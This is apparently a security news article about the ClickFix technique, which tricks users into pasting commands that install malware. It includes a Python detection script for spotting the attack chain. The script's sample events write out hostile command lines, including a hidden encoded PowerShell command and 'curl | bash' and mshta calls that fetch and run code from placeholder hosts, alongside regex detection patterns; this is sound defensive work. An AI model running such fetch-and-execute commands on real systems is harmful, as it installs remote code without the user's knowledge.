The ClickFix social engineering method has made a strong comeback. It tricks people into running harmful commands themselves, which quietly install malware on their devices. The method has quickly gone from a niche tactic to one of the most common ways cybercriminals gain initial access to systems.

Both cybercriminal groups and likely state-sponsored actors, including APT28 and North Korea's PurpleBravo, are using the method. The malware families delivered in these campaigns include MacSync, Lumma Stealer, Odyssey Stealer, and NetSupport RAT.

The ClickFix execution chain is the same on Windows and macOS. It starts with an obfuscated input the victim is asked to paste, passes through the native system shell, pulls payloads from remote infrastructure, and ends with in-memory execution that leaves almost no trace on disk. On Windows, persistence is achieved by placing a shortcut in the Startup folder, which relaunches the malware on every reboot.

Enforcing PowerShell Constrained Language Mode together with AppLocker or Windows Defender Application Control policies helps block unauthorized script execution. Regularly feeding fresh threat intelligence into SIEM and EDR platforms, so that newly discovered staging and command-and-control domains are blocked, is another important safeguard.
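To make the chain above concrete from the detection side, here is an added example (not from the article or from ZerOwl) that scores process-creation events for the ClickFix pattern: a native shell spawned from a user-facing launcher, with command-line traits of obfuscation, remote fetch and in-memory execution. The sample events, hostnames and URLs are constructed, and the indicator names, weights and threshold are assumptions to tune against your own telemetry.

```python
import re

# Constructed sample events (not from the article), shaped like Sysmon Event ID 1
# / Windows 4688 process-creation records plus a macOS process log entry.
SAMPLE_EVENTS = [
    {"host": "WIN-01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand QUJDRA=="},
    {"host": "WIN-02", "parent": "chrome.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://staging.example.invalid/v.hta"},
    {"host": "MAC-01", "parent": "Terminal", "image": "bash",
     "cmdline": 'bash -c "curl -fsSL http://cdn.example.invalid/f | bash"'},
    {"host": "WIN-03", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\patch.ps1"},
]

# ClickFix relies on the victim pasting the command into the Run dialog, a
# browser prompt or the Terminal, so these parents launching a shell is the anchor.
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "Terminal"}
NATIVE_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                 "bash", "sh", "zsh", "osascript"}

# Command-line traits of the chain: obfuscated input, hidden window,
# remote payload fetch and in-memory execution. Weights are assumptions.
INDICATORS = {
    "encoded_command": re.compile(r"-(enc|encodedcommand|ec)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    score, hits = 0, []
    if event["parent"] in USER_LAUNCHERS and event["image"] in NATIVE_SHELLS:
        score, hits = score + 2, hits + ["user_launched_shell"]
    for name, pattern in INDICATORS.items():
        if pattern.search(event["cmdline"]):
            score, hits = score + 1, hits + [name]
    return score, hits

def triage(events, threshold=3):
    """Return the events whose score reaches the threshold, i.e. look like a ClickFix chain."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append({"host": ev["host"], "score": score, "hits": hits})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['host']}: score={f['score']} hits={','.join(f['hits'])}")
```

The benign admin script on WIN-03 scores zero because it is launched by services.exe with no obfuscation or download traits, which is the separation the threshold is meant to give you.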

Targeted user awareness training that focuses on manual verification prompt scams is one of the most effective defenses, because it stops ClickFix before any malicious command is ever run. On macOS, mobile device management should restrict access to the Terminal, and System Integrity Protection should always remain enabled.

On both platforms, that kind of targeted user awareness training is the surest way to stop ClickFix attacks before they even start. You can find out more about ZerOwl at ZerOwl.com and by following us on Twitter @ZerOwl_News, Facebook, and LinkedIn.